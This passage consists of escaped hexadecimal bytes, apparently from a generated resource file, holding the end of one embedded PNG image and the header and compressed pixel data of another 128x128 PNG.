\\xa2\\x82\\x70\\x28\\x6a\\x6f\\x6f\\x47\\\n\\xe6\\x13\\x0d\\xb6\\x57\\xd4\\x83\\xda\\x5b\\x5c\\x4f\\x90\\x3d\\x73\\xe6\\x0c\\\n\\xba\\xef\\xb9\\x51\\x88\\x46\\xf1\\xde\\xcf\\x1f\\xc6\\xad\\xb7\\xde\\x2a\\xe9\\\n\\x88\\x01\\x71\\xdf\\x59\\xaf\\x28\\x8a\\x10\\x00\\xfe\\x4e\\xa9\\xe1\\x0a\\xa0\\\n\\xaa\\xaa\\xb8\\x7d\\xe6\\x54\\x21\\x1e\\xea\\x96\\x25\\xf7\\x4a\\x00\\x25\\x84\\\n\\x17\\x54\\x50\\x50\\x60\\x7b\\x21\\xef\\x38\\xf6\\x02\\xd6\\xaf\\x5f\\xcf\\xf5\\\n\\x33\\x8a\\x8a\\x8a\\xf0\\xe2\\x3c\\xfb\\x67\\x7c\\x37\\xce\\xbf\\x85\\xeb\\x78\\\n\\x57\\x2a\\xc6\\x20\\x5c\\xb8\\x70\\xa1\\xed\\x7e\\xd0\\xc7\\xd2\\x76\\x73\\xb7\\\n\\x68\\x2d\\x5d\\xba\\x54\\x88\\xe4\\x4c\\x7f\\x2d\\xb8\\x1d\\x65\\x65\\x65\\xb2\\\n\\x55\\xc7\\x98\\xb8\\x8d\\x09\\x8b\\x8b\\x8b\\x6d\\xb7\\xa3\\x6d\\xbf\\x11\\xdc\\\n\\x27\\x26\\x4a\\x4b\\x4b\\x85\\x58\\x8c\\x97\\x93\\x30\\x32\\x12\\x5e\\xd4\\x30\\\n\\xed\\x02\\x70\\x74\\xe5\\x9d\\xf8\\xef\\xa9\\x47\\xa1\\x55\\x14\\x72\\x6f\\x94\\\n\\x6b\\xd7\\xae\\xb5\\x1d\\xc0\\xc7\\x27\\xfe\\x00\\x29\\x7f\\xf5\\x48\\x00\\x65\\\n\\x24\\xbc\\xa0\\x35\\x6b\\xd6\\x58\\x7e\\x5e\\x7c\\xd1\\x81\\x27\\xb1\\x70\\xe1\\\n\\x42\\xdc\\x7c\\xf3\\xcd\\xc8\\xb1\\xe8\\xd0\\xca\\xca\\xca\\x4a\\xdb\\x72\\xc3\\\n\\x14\\x1d\\xf1\\xe3\\x57\\xbf\\xfa\\x15\\x6e\\xb9\\xe5\\x16\\xae\\x9e\\x57\\xa9\\\n\\x18\\x84\\xb0\\xad\\xad\\x0d\\x6f\\xbd\\xf5\\x16\\x86\\x0f\\x0f\\xbd\\x5d\\xa7\\\n\\xab\\xab\\x0b\\x7e\\xbf\\x1f\\x8a\\xa2\\x00\\x00\\xce\\x9f\\x3f\\x8f\\xae\\xae\\\n\\x2e\\xf8\\x7c\\xa1\\x13\\x3a\\x25\\x27\\x27\\x23\\x29\\x29\\x09\\x99\\x99\\x99\\\n\\x18\\x3e\\x7c\\x38\\x92\\x93\\x93\\x31\\x6a\\xd4\\x28\\x64\\x66\\x66\\x62\\xc4\\\n\\x88\\x11\\x48\\x4a\\x4a\\xb2\\xa5\\x11\\xee\\xda\\xb5\\x0b\\x57\\xad\\x7b\\x18\\\n\\x77\\xec\\x3b\\x0a\\x00\\x78\\x78\\x72\\xa6\\x29\\x7b\\x04\\x67\\xef\\x6d\\xc5\\\n\\xb0\\x61\\xc3\\x90\\x96\\x96\\x86\\xf4\\xf4\\x74\\xb8\\xdd\\x6e\\x24\\x27\\x27\\\n\\xe3\\x92\\x4b\\x2e\\xc1\\xb4\\x69\\xd3\\x70\\xc5\\x15\\x57\\x60\\xda\\xb4\\x69\\\n\\x71\\x9f\\x0f\\x54\\x42\\x28\\x25\\x25\\x15\\xfb\\x63\\x42\\x29\\x29\\x29\\x09\\\n\\xa1\\x94\\x94\\x84\\x50\\x4a\\x4a\\x4a\\x42\\x28\\x25\\x25\\x21\\x94\\x92\\x92\\\n\\x92\\x10\\x4a\\x49\\x49\\x08\\xa5\\xa4\\xa4\\x24\\x84\\x52\\x52\\x12\\x42\\x29\\\n\\x29\\x29\\x09\\xa1\\x94\\x94\\xb0\\xfa\\xff\\x1e\\xbc\\x54\\xf6\\x8e\\x24\\x20\\\n\\x64\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x0d\\xe3\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x80\\x00\\x00\\x00\\x80\\x10\\x06\\x00\\x00\\x00\\x93\\xae\\xbd\\x88\\\n\\x00\\x00\\x00\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\\n\\x00\\x00\\x00\\x20\\x63\\x48\\x52\\x4d\\x00\\x00\\x7a\\x26\\x00\\x00\\x80\\x84\\\n\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00\\x75\\x30\\x00\\x00\\xea\\x60\\\n\\x00\\x00\\x3a\\x98\\x00\\x00\\x17\\x70\\x9c\\xba\\x51\\x3c\\x00\\x00\\x00\\x06\\\n\\x62\\x4b\\x47\\x44\\x00\\x00\\x00\\x00\\x00\\x00\\xf9\\x43\\xbb\\x7f\\x00\\x00\\\n\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x01\\x80\\x00\\x00\\x01\\x80\\x00\\x1f\\\n\\xe4\\xcb\\x22\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\xe3\\x01\\x1c\\x0d\\\n\\x10\\x29\\x7b\\x03\\x1b\\x75\\x00\\x00\\x0c\\xd2\\x49\\x44\\x41\\x54\\x78\\xda\\\n\\xed\\xdd\\x6b\\x70\\x54\\xe5\\x19\\x07\\xf0\\xe7\\x39\\x0b\\x01\\x0a\\xe6\\x42\\\n\\x84\\x70\\x49\\xce\\xde\\x42\\x08\\x78\\x01\\x83\\x12\\xa0\\x4c\\x86\\x9b\\x51\\\n\\x69\\x09\\x82\\x05\\x91\\x88\\xa0\\xc3\\xc4\\x22\\x24\\x3a\\x89\\xa0\\x75\\x68\\\n\\x8b\\xf5\\x32\\x1a\\x21\\x86\\x28\\x8c\\x0d\\xb4\\xd1\\xb1\\x5c\\x86\\x78\\x29\\\n\\x56\\x21\\x01\\x34\\x20\\x16\\x42\\x24\\x95\\xa0\\x4d\\x32\\x90\\x64\\x77\\x83\\\n\\xc1\\x12\\x1b\\x48\\xda\\x04\\x91\\x64\\xcf\\xdb\\x0f\\x21\\xed\\xb4\\xa3\\x43\\\n\\xa8\\xe7\\xe4\\xcd\\xee\\xfb\\xff\\x7d\\xcb\\xce\\xee\\x73\\x9e\\xe7\\xec\\x9e\\\n\\xff\\x9e\\xb3\\xd9\\x3d\\x87\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x17\\xcb\\x6e\\x00\\xba\\\n\\x83\\x79\\xd4\\x1a\\xfb\\x24\\xfb\\xa4\\xf8\\x78\\xff\\x5b\\xc6\\x76\\x5b\\x63\\\n\\x64\\xa4\\xd8\\xc0\\x59\\x62\\x43\\x78\\xb8\\x6d\\x35\\x95\\x53\\xe6\\x80\\x01\\\n\\xb2\\x3a\\xf3\\xbf\\x44\\x13\\x28\\xe7\\x9b\\x6f\\x38\\x4b\\x6c\\xe0\\xac\\xe6\\\n\\x66\\xdb\\xcf\\xb4\\xc5\\xfe\\xa1\\x4d\\x4d\\xa7\\xb3\\x7d\\xa5\\xbe\\xd2\\xea\\\n\\xea\\xce\\x7b\\x09\\x21\\x7b\\x0d\\xc2\\x77\\x43\\x00\\xf4\\x32\\xb1\\x79\\x8e\\\n\\x46\\x47\\x63\\x72\\xb2\\x88\\x11\\x3a\\x15\\x2e\\x5d\\x4a\\x4f\\x89\\xfd\\xe2\\\n\\xce\\x59\\xb3\\xe8\\x32\\xdf\\xcf\\x33\\x87\\x0e\\x95\\xdd\\x5f\\xb7\\x85\\x88\\\n\\x3f\\x88\\x0f\\x1b\\x1b\\xe9\\x79\\xbe\\x9d\\x8b\\x0e\\x1c\\x30\\x26\\x88\\xa1\\\n\\x3c\\xa7\\xa0\\xc0\\xa3\\xd7\\xd7\\x7b\\xf4\\x03\\x07\\x64\\xb7\\x07\\x9d\\x10\\\n\\x00\\x92\\xb9\\xe7\\xea\\x0d\\x7a\\xc3\\x94\\x29\\x22\\x9f\\xdd\\x5a\\xc6\\xfa\\\n\\xf5\\x3c\\x85\\xa2\\xa8\\x7c\\xf2\\x64\\xd9\\x7d\\x59\\xe6\\x9f\\x14\\x41\\x4b\\\n\\x8e\\x1c\\xe1\\xb5\\x7c\\x82\\x9e\\xc9\\xca\\xaa\\xc9\\xf0\\x92\\x97\\x4a\\x4b\\\n\\x65\\xb7\\xa5\\x2a\\x9b\\xec\\x06\\x54\\xe5\\x76\\xeb\\xba\\xe3\\x8d\\xb4\\x34\\\n\\xf1\\x1a\\x25\\x52\\xfb\\xae\\x5d\\x9c\\xcc\\x25\\xfc\\x9a\\xdd\\x2e\\xbb\\x2f\\\n\\xcb\\xf5\\xa3\\x4b\\x74\\x32\\x26\\x46\\xdc\\x43\\x2f\\x8b\\x9c\\x65\\xcb\\x22\\\n\\x86\\x84\\x7d\\x16\\x71\\xf1\\xf2\\xe5\\x0b\\x9f\\xb6\\xb4\\x34\\xd7\\x1d\\x39\\\n\\x22\\xbb\\x3d\\xd5\\x60\\x0f\\xa0\\x87\\xb9\\x23\\xec\\xb9\\xf6\\xdc\\xbc\\x3c\\\n\\x1a\\x4c\\x2f\\x73\\x6e\\x7a\\xba\\xec\\x7e\\x7a\\x8d\\x95\\xec\\x23\\xef\\xc6\\\n\\x8d\\xb5\\x99\\x5e\\xf2\\xd2\\x63\\x8f\\xc9\\x6e\\x47\\x15\\xd8\\x03\\xe8\\x21\\\n\\x2e\\x97\\x83\\x1c\\xf4\\xe4\\x93\\xfc\\x23\\xaa\\xe2\\xea\\xa7\\x9e\\x92\\xdd\\\n\\x4f\\xaf\\xf3\\x29\\x85\\x53\\xf8\\xa4\\x49\\x83\\x37\\x84\\x8f\\x0c\\x1b\\xd1\\\n\\xda\\x7a\\x61\\x77\\xcb\\xd7\\x2d\\x5f\\x1f\\x3d\\x2a\\xbb\\xad\\x60\\xa7\\xc9\\\n\\x6e\\x20\\xd8\\xb9\\xab\\xf4\\x22\\xbd\\x28\\x21\\x81\\xef\\x14\\x0f\\xd0\\x83\\\n\\xcf\\x3d\\x27\\xbb\\x9f\\x5e\\xef\\x38\\xdd\\xca\\x89\\xd9\\xd9\\xce\\x13\\xd1\\\n\\xed\\xce\\x13\\xb7\\xdd\\x26\\xbb\\x9d\\x60\\x87\\x00\\xb0\\x14\\x33\\x6d\\xe1\\\n\\x32\\x2e\\xdb\\xb8\\x91\\x8a\\xe9\\x10\\x95\\x68\\x58\\xdf\\x57\\x73\\x65\\x3d\\\n\\x69\\xc9\\xb6\\xdb\\xc4\\xdb\\xb9\\xb9\\x9d\\x37\\x32\\x0e\\x55\\x2d\\x82\\x17\\\n\\xa4\\x45\\x62\\x43\\x1d\\x59\\x8e\\xac\\xe4\\x64\\xda\\x4d\\xbf\\xe3\\xdf\\x4f\\\n\\x9d\\x2a\\xbb\\x9f\\x80\\x73\\x1d\\x5d\\xa0\\x37\\xa7\\x4c\\x71\\x2e\\x8f\\x79\\\n\\xc7\\xb9\\x7c\\xd6\\x2c\\xd9\\xed\\x04\\x2b\\x04\\x80\\x45\\x8c\\x26\\xb1\\x58\\\n\\x2c\\x5e\\xbc\\x58\\x76\\x1f\\x81\\x4e\\x9b\\xce\\x23\\x45\\x9f\\xfb\\xee\\x93\\\n\\xdd\\x47\\xb0\\x42\\x00\\x58\\x42\\xd3\\x38\\x52\\x30\\x45\\xdc\\x7d\\xb7\\xec\\\n\\x4e\\x02\\x5e\\x0e\\xc5\\xd1\\x6b\\xf3\\xe7\\x77\\xfe\\x81\\x43\\x28\\xb3\\xe1\\\n\\xd8\\xca\\x64\\x2e\\x97\\xcb\\xe5\\x72\\xe9\\x3a\\xb3\\xdf\\x6f\\x18\\x3e\\x9f\\\n\\xd9\\xf5\\xc5\\x11\\x91\\x4e\\xde\\xdd\\xbb\\xe9\\x8c\\x76\\x98\\xe6\\xee\\xdd\\\n\\xab\\x2d\\x32\\x3e\\xe3\\x93\\xe7\\xcf\\xcb\\x9a\\xd7\\xd8\\xa9\\xdd\\x22\\x6e\\\n\\x1e\\x3c\\x98\\x1a\\xc5\\x33\\xe2\\x99\\xd9\\xb3\\x39\\x9d\\xe6\\x70\\x4a\\x4a\\\n\\x8a\\xd9\\xcb\\xe1\\x47\\x3b\\xe6\\xf6\\xc9\\x8c\\x89\\xa9\\xc9\\x68\\xc8\\xab\\\n\\xc9\\xf8\\xf2\\x4b\\x59\\xf3\\x06\\x1b\\x04\\x80\\xc9\\x62\\xc9\\x41\\x0e\\x9a\\\n\\x36\\x4d\\xb8\\x85\\x9d\\x1c\\x25\\x25\\x66\\xd5\\x15\\x53\\xc4\\x5f\\xe8\\xb9\\\n\\xcd\\x9b\\xeb\\xde\\xac\\x8f\\xf4\\xa6\\xae\\x5c\\x29\\x7b\\xce\\xef\\xe3\\xae\\\n\\xd2\\x8b\\x1c\\xe9\\x9b\\x37\\xd3\\x4f\\xf9\\x61\\xfa\\xd3\\x8a\\x15\\x66\\xd5\\\n\\xe5\\x5a\\xf6\\x91\\x77\\xfa\\xf4\\x1a\\xf2\\x92\\x97\\x0e\\x1e\\x94\\x3d\\x67\\\n\\xb0\\xc0\\x2e\\x95\\xd9\\x62\\x0d\\x9d\\x9d\\x43\\x86\\x98\\x5d\\x56\\x3b\\x4a\\\n\\xb7\\xf0\\xda\\xde\\xff\\xc2\\xe7\\x39\\x94\\xc6\\xef\\x9b\\x17\\x7c\\xff\\x66\\\n\\xd1\\x7a\\x55\\x1d\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\x14\\\n\\x86\\x00\\x00\\x50\\x18\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\\n\\x14\\x86\\x00\\x00\\x50\\x58\\x0f\\x7d\\x13\\x90\\x39\\xf6\\x46\\x7d\\xab\\x73\\\n\\x79\\x6a\\xaa\\x58\\xcd\\x61\\xc6\\x1d\\x69\\x69\\xc2\\xa0\\xcf\\xf8\\x74\\x42\\\n\\x02\\x3f\\x4b\\xdb\\x28\\x7f\\xe0\\x40\\xd9\\x2b\\x02\\x40\\x06\\xb1\\x96\\x52\\\n\\x29\\xad\\xad\\x8d\\xea\\x44\\x7f\\x31\\xb7\\xbc\\x9c\\xb6\\x71\\x29\\xad\\xfe\\\n\\xed\\x6f\\xeb\\xea\\x7c\\x7b\\x7c\\x7b\\x76\\xec\\xb8\\x72\\x2f\\xcb\\xce\\xaa\\\n\\x6c\\x71\\x00\\xd8\\x6c\\xee\\x41\\xfa\\x53\\x0e\\xda\\xb6\\x8d\\xa2\\x78\\x1b\\\n\\x39\\xee\\xbd\\xd7\\xda\\xe5\\x01\\x04\\x89\\x05\\xa2\\x98\\x66\\xee\\xd8\\x51\\\n\\xfb\\x42\\x7d\\xbc\\xf7\\x77\\x4b\\x96\\x74\\xde\\xe8\\xf7\\x9b\\xbd\\x18\\xcb\\\n\\x4e\\x09\\xe6\\x9a\\xa5\\x4f\\x75\\x4c\\xfb\\xd5\\xaf\\xb8\\x9d\\x3f\\x21\\x5a\\\n\\xb5\\xca\\xba\\x35\\x05\\x10\\x84\\x2a\\xf9\\x0f\\xe4\\xb9\\xe9\\xa6\\xc1\\xfd\\\n\\xc3\\xce\\x45\\x5c\\x6a\\x6f\\xbf\\xd0\\xda\\xf2\\x6c\\x73\\xc7\\xc7\\x1f\\x9b\\\n\\xbd\\x18\\xd3\\x3f\\x03\\x88\\xce\\x8c\\xce\\x8c\\xce\\x1c\\x30\\x80\\xd6\\xf1\\\n\\x52\\x91\\xfa\\xf8\\xe3\\x3d\\xb3\\xb6\\x00\\x82\\x93\\x38\\x41\\x1f\\x18\\xef\\\n\\xaf\\x59\\xe3\\x20\\x07\\x39\\xa8\\x7f\\x7f\\xb3\\xeb\\x9b\\x7e\\x08\\x30\\x6a\\\n\\x8c\\xb3\\xbf\\xb3\\x7f\\x52\\x92\\x71\\xd9\\x88\\x12\\xc3\\x0e\\x1d\\xea\\x99\\\n\\xd5\\x04\\x10\\xdc\\x8c\\xc7\\x8c\\xe9\\x9c\\x95\\x94\\xe4\\x49\\x3f\\xf3\\xba\\\n\\x27\\xfd\\xf0\\x61\\xb3\\xea\\x9a\\xbe\\x07\\x20\\x5a\\x3a\\x7e\\x23\\xca\\xc2\\\n\\xc3\\x7b\\x74\\xed\\x00\\x04\\x39\\x9b\\xa0\\xf5\\xf4\\x96\\xf9\\xdb\\x95\\xe9\\\n\\x01\\xe0\\x9f\\xdd\\xe7\\x14\\xe7\\x79\\xbd\\x3d\\xb1\\x52\\x00\\x54\\x61\\xdc\\\n\\x4b\\x37\\xf0\\x2e\\x8f\\xc7\\xec\\xba\\x16\\xfd\\x17\\x80\\xd9\\x5d\\xa4\\xb7\\\n\\x39\\xe2\\x2a\\x2b\\x69\\x25\\x8f\\xa5\\xcb\\xf1\\xf1\\x56\\xaf\\x20\\x80\\x60\\\n\\x24\\x8a\\xc8\\x49\\xf7\\x54\\x56\\xd6\\x8d\\xf2\\x1d\\xf4\\x6e\\xb8\\xe1\\x06\\\n\\xb3\\xeb\\x5b\\xf4\\x45\\x20\\x21\\x8c\\xb7\\x44\\x31\\x27\\x65\\x64\\xd0\\x4a\\\n\\x5a\\x4a\\x0f\\x99\\xff\\xef\\x0b\\x80\\xa0\\xd6\\xb5\\xdd\\xbc\\x20\\xe6\\x19\\\n\\x7a\\x46\\x86\\x55\\x8b\\xb1\\xfc\\x8b\\x40\\xb1\\xb1\\xba\\xee\\x74\\x2e\\x58\\\n\\x20\\xc2\\xa8\\x42\\x78\\xb6\\x6c\\xa1\\x66\\x1e\\x4f\\x8e\\xb0\\x30\\xab\\x97\\\n\\x0b\\x10\\x90\\x26\\x52\\x0b\\x69\\xcd\\xcd\\xc6\\xab\\xa2\\xd4\\xd8\\xb3\\x7c\\\n\\xb9\\x27\\xb2\\x3e\\xbe\\x3e\\xfe\\xed\\xb7\\xad\\x5a\\x5c\\x8f\\x9d\\x13\\x30\\\n\\x2e\\x6d\\x78\\x7e\\x5c\\xda\\xf5\\xd7\\xfb\\xe3\\xfb\\x4e\\x6c\\x3f\\xb6\\x68\\\n\\x11\\x45\\xd1\\xb7\\x62\\x72\\x42\\x82\\x30\\xb8\\x4a\\x4c\\x1a\\x34\\xe8\\xaa\\\n\\x05\\xee\\xa1\\x56\\x6a\\x9d\\x3c\\x99\\x6f\\xa2\\x97\\x78\\x7d\\x74\\xb4\\x59\\\n\\x7d\\x89\\x75\\xf4\\xb4\\x58\\x57\\x58\\xd8\\x53\\xeb\\x01\\x7a\\x17\\x5e\\x47\\\n\\xbf\\xe6\\x75\\x0b\\x16\\x98\\x55\\x4f\\x7c\\x4e\\xab\\xc5\\xe3\\x5f\\x7e\\x49\\\n\\x6f\\xd3\\x20\\x1a\\x74\\xf5\\x4b\\x9b\\xb1\\x26\\xc6\\x70\\x69\\x6b\\x2b\\x25\\\n\\xf1\\x3c\\xf1\\x5e\\x79\\x79\\xdf\\x17\\xdb\\xab\\xdb\\xab\\x77\\xee\\xac\\x7e\\\n\\xf5\\x6c\\xe8\\xd9\\xd0\\xa6\\x26\\xcb\\xe7\\xb7\\x7a\\x01\\x66\\x71\\xbd\\x69\\\n\\x7f\\xdd\\xfe\\xfa\\xae\\x5d\\x66\\x3f\\x61\\xb5\\xb5\\x3e\\x9f\\xd7\\x8b\\x2b\\\n\\xcf\\xa8\\xca\\xed\\xb6\\xdb\\x1d\\x0e\\xf3\\xbe\\x6a\\xdb\\xf5\\x86\\x52\\xb7\\\n\\xc4\\xb7\\xcc\\xb7\\x6c\\xe1\\x42\\xd9\\xf3\\x5d\\x0d\\x7e\\x0c\\x04\\xa0\\x30\\\n\\x04\\x00\\x80\\xc2\\x10\\x00\\x00\\x0a\\x43\\x00\\x00\\x28\\x0c\\x01\\x00\\xa0\\\n\\x30\\x04\\x00\\x80\\xc2\\x10\\x00\\x00\\x0a\\x43\\x00\\x00\\x28\\x0c\\x01\\x00\\\n\\xa0\\x30\\x04\\x00\\x80\\xc2\\x10\\x00\\x00\\x0a\\x43\\x00\\x00\\x28\\x0c\\x01\\\n\\x00\\xa0\\x30\\x04\\x00\\x80\\xc2\\x10\\x00\\x3d\\x4c\\x2f\\xd2\\x8b\\xf4\\xa2\\\n\\xe1\\xc3\\x5d\\xaf\\xd9\\x5d\\x76\\xd7\\xec\\xd9\\xee\\x08\\x7b\\xae\\x3d\\xf7\\\n\\xae\\xbb\\x3a\\x4f\\xfb\\x3c\\x6c\\x98\\xec\\xfe\\x30\\xbf\\x5a\\x10\\x00\\x16\\\n\\x1b\\xd5\\x14\\x9d\\x19\\x9d\\x39\\x72\\xa4\\x6b\\x8f\\xfd\\xa4\\xfd\\xe4\\xee\\\n\\xdd\\x7d\\x73\\xf8\\x79\\xed\\x85\\x86\\x06\\x7e\\x89\\xfc\\x6c\\x7c\\xf0\\x01\\\n\\x0d\\xa6\\x97\\x39\\x77\\xcf\\x1e\\xdb\\x23\\xe2\\x01\\x7a\\xb0\\xa1\\xc1\\x1d\\\n\\xad\\x17\\x39\\xc6\\xbd\\xfb\\xee\\xe8\\x87\\x62\\xb2\\x63\\xb2\\x47\\x8c\\x90\\\n\\xdd\\x3f\\xe6\\x0f\\x6e\\x08\\x00\\x8b\\x74\\xbd\\xf0\\x8d\\xf1\\x9a\\xdb\\x76\\\n\\xfb\\xd1\\xa3\\x9c\\x4e\\x73\\x38\\x25\\x25\\x85\\x6a\\xc9\\x47\\xdf\\x75\\x02\\\n\\x92\\x62\\x3a\\x44\\x25\\x9a\\x46\\xfd\\xf8\\x61\\x6a\\xb9\\xfb\\xee\\x8e\\xfd\\\n\\x3c\\x50\\xbb\\xa9\\xb4\\x34\\x50\\x37\\x04\\xd5\\xe7\\x0f\\x14\\x08\\x00\\x8b\\\n\\xf8\\x8f\\xd9\\x96\\xd9\\x96\\x6d\\xde\\x4c\\x21\\x9c\\xcd\\x2b\\x62\\x62\\xae\\\n\\xb9\\xc0\\x95\\xc7\\x75\\x34\\x71\\xaa\\xed\\x8b\\x57\\x5f\\x95\\x3d\\x0f\\xe6\\\n\\x0f\\x4e\\x08\\x00\\x93\\x75\\xbd\\x63\\x71\\x2e\\xad\\xe2\\x8c\\x39\\x73\\x7e\\\n\\x70\\xc1\\x91\\xfc\\x0b\\xb2\\xcd\\x9d\\x1b\\x28\\xc7\\xc8\\xaa\\xcf\\x1f\\x68\\\n\\x10\\x00\\x26\\xeb\\x78\\x57\\x0b\\xd1\\x42\\xc6\\x8d\\xfb\\xde\\x5d\\xdd\\x6b\\\n\\x75\\x65\\xd7\\xb8\\x4f\\x28\\x65\\x51\\xd6\\xb8\\x71\\xb2\\xe7\\xc3\\xfc\\xc1\\\n\\x05\\x01\\x60\\x32\\x8e\\x14\\x39\\xda\\xc6\\x6e\\x9c\\xe5\\xf8\\x5a\\x0d\\x35\\\n\\x0a\\xf9\\x9d\\xd0\\x50\\xd9\\xf3\\x61\\xfe\\xe0\\x82\\x00\\x00\\x50\\x18\\x02\\\n\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\x14\\x86\\x00\\x00\\x50\\x18\\\n\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\x14\\x86\\x00\\x00\\x50\\\n\\x18\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\x14\\x86\\x00\\x00\\\n\\x50\\x18\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\x14\\x86\\x00\\\n\\x00\\x50\\x18\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\x85\\x21\\x00\\x00\\x14\\x86\\\n\\x00\\x30\\x99\\x78\\x5a\\x9b\\x2d\\xee\\xb8\\x7c\\x39\\x50\\xea\\x06\\x4a\\x9f\\\n\\x81\\x32\\x7f\\xa0\\x41\\x00\\x98\\xcc\\x28\\xe1\\x0e\\xee\\xf0\\x78\\xcc\\xae\\\n\\x2b\\x66\\xf9\\xdf\\xd5\\x9e\\xae\\xad\\x95\\x3d\\x1f\\xe6\\x0f\\x2e\\x08\\x00\\\n\\x93\\x79\\xb6\\x7a\\xb6\\x7a\\xb6\\x7e\\xfe\\x39\\x6d\\x12\\x95\\x14\\x52\\x5d\\\n\\xfd\\x43\\xeb\\x89\\x22\\x72\\xd2\\x3d\\x95\\x95\\x75\\x51\\x67\\xce\\xd5\\x45\\\n\\x7d\\xf1\\x85\\xec\\xf9\\x30\\x7f\\x70\\x41\\x00\\x58\\x42\\x08\\xe3\\x2d\\x51\\\n\\xcc\\x49\\x19\\x19\\xb4\\x92\\x96\\xd2\\x43\\x7e\\xff\\x35\\x97\\xe8\\x7a\\xdc\\\n\\x0b\\x62\\x9e\\xa1\\x67\\x64\\xc8\\x9e\\x08\\xf3\\x07\\xa7\\x3e\\xb2\\x1b\\x08\\\n\\x56\\x9e\\xad\\x67\\xe6\\x7b\\xb6\\xee\\xdf\\x1f\\x1b\\xab\\xeb\\x4e\\xe7\\x7d\\\n\\xf7\\x89\\x70\\xaa\\x10\\xde\\x2d\\x5b\\xa8\\x99\\xc7\\x93\\x23\\x2c\\xec\\x7b\\\n\\x1f\\x38\\x91\\x5a\\x48\\x6b\\x6e\\x36\\x96\\x8a\\xc5\\xc6\\xc2\\xe5\\xcb\\x3d\\\n\\x91\\xf5\\xf1\\xf5\\xf1\\x1f\\x7e\\x28\\x7b\\x1e\\xcc\\x1f\\x9c\\x10\\x00\\x16\\\n\\xab\\xa9\\xa9\\xaf\\xf7\\x78\\x0a\\x0b\\xe3\\xd2\\x86\\x17\\xc6\\xa5\\x95\\x94\\\n\\xf8\\xe3\\xfb\\xee\\x6e\\x3f\\xb6\\x68\\x11\\x45\\xd1\\xb7\\x62\\x72\\x42\\xc2\\\n\\xbf\\xef\\x98\\xc4\\xf3\\xc4\\x7b\\xe5\\xe5\\x7d\\x5f\\x6c\\xaf\\x6f\\xaf\\xde\\\n\\xb9\\xb3\\x3a\\xf2\\x6c\\xe8\\xd9\\xd0\\xa6\\x26\\xd9\\xfd\\x63\\xfe\\xe0\\x86\\\n\\x00\\xe8\\x21\\xa7\\xf2\\xbf\\x4a\\x3b\\x95\\xff\\xf7\\xbf\\x77\\xfe\\x75\\xe5\\\n\\x6a\\xb7\\x15\\xdf\\x79\\xd7\\x50\\x0a\\xc2\\x0b\\x60\\xa9\\x3e\\x7f\\x6f\\x85\\\n\\xcf\\x00\\x00\\x14\\x86\\x00\\x00\\x50\\x18\\x02\\x00\\x40\\x61\\x08\\x00\\x00\\\n\\x85\\x21\\x00\\x00\\x14\\x86\\x00\\x00\\x50\\x18\\x02\\x00\\x40\\x61\\x08\\x00\\\n\\x00\\x85\\x21\\x00\\x00\\x14\\x16\\x30\\x01\\xc0\\x2b\\xc4\\x29\\x5e\\x66\\x18\\\n\\x66\\xd7\\x1d\\x5b\\x38\\xb6\\x70\\x6c\\x61\\x48\\x88\\xec\\xf9\\xa0\\x67\\x59\\\n\\xf5\\xbc\\x73\\x81\\x18\\xc0\\x1b\\xff\\x8f\\x1f\\x3f\\x49\\x12\\x30\\x01\\x20\\\n\\x1e\\xe1\\xf7\\xe9\\x64\\x6b\\xab\\xd9\\x75\\x2f\\x8e\\xbe\\x38\\xfa\\xe2\\x68\\\n\\xa7\\x53\\xf6\\x7c\\xd0\\xb3\\xda\\x3f\\x6d\\xdb\\xd0\\xb6\\xc1\\xed\\x36\\xbb\\\n\\xae\\x48\\xe7\\x22\\x31\\xde\\xfc\\xd7\\xa9\\x55\\x02\\x26\\x00\\x78\\x06\\xe5\\\n\\x89\\xf3\\x0d\\x0d\\x66\\xd7\\xb5\\xdd\\x61\\xc4\\xf1\\xc4\\x05\\x0b\\x64\\xcf\\\n\\x07\\x3d\\xcb\\x7f\\xbd\\x98\\xc1\\xb3\\xcd\\x7f\\xde\\xb5\\x79\\x5c\\xc0\\x05\\\n\\xe6\\xbf\\x4e\\xad\\x12\\x30\\x01\\x20\\x6e\\xe1\\x69\\x3c\\xad\\xaa\\xca\\xf4\\\n\\xc2\\xd3\\x78\\x98\\x18\\x91\\x95\\x15\\x9b\\x17\\x33\\x23\\x66\\x86\\xf9\\xef\\\n\\x08\\xd0\\xbb\\xb8\\x73\\xa2\\x33\\xdd\\x39\\xb1\\xb1\\xfc\\x2c\\xfd\\x4c\\xdc\\\n\\x9f\\x95\\x65\\x76\\x7d\\x51\\xe4\\xff\\x84\\x3e\\xaa\\xac\\x94\\x3d\\x67\\x77\\\n\\x05\\x4c\\x00\\xd8\\xfa\\x74\\x64\\x76\\x64\\x1e\\x3e\\x6c\\x7a\\xe1\\x32\\x0a\\\n\\x23\\x23\\x3c\\xdc\\x08\\xd1\\xbc\\xb6\\xfe\\xfb\\xf7\\x8f\\x5a\\xe0\\x20\\x07\\\n\\x8d\\x1f\\x2f\\x7b\\x5e\\x30\\x97\\xbb\\x4a\\x2f\\xd2\\x8b\\x12\\x12\\xc4\\x8f\\\n\\x6c\\x7f\\xf4\\x1f\\xd8\\xb7\\x8f\\x86\\xf0\\x3c\\x9e\\x11\\x6a\\xde\\xef\\x0e\\\n\\xdd\\x64\\x27\\x8